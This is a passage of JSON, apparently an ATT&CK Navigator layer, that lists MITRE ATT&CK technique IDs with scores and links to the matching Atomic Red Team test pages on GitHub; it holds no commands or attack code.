Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View 
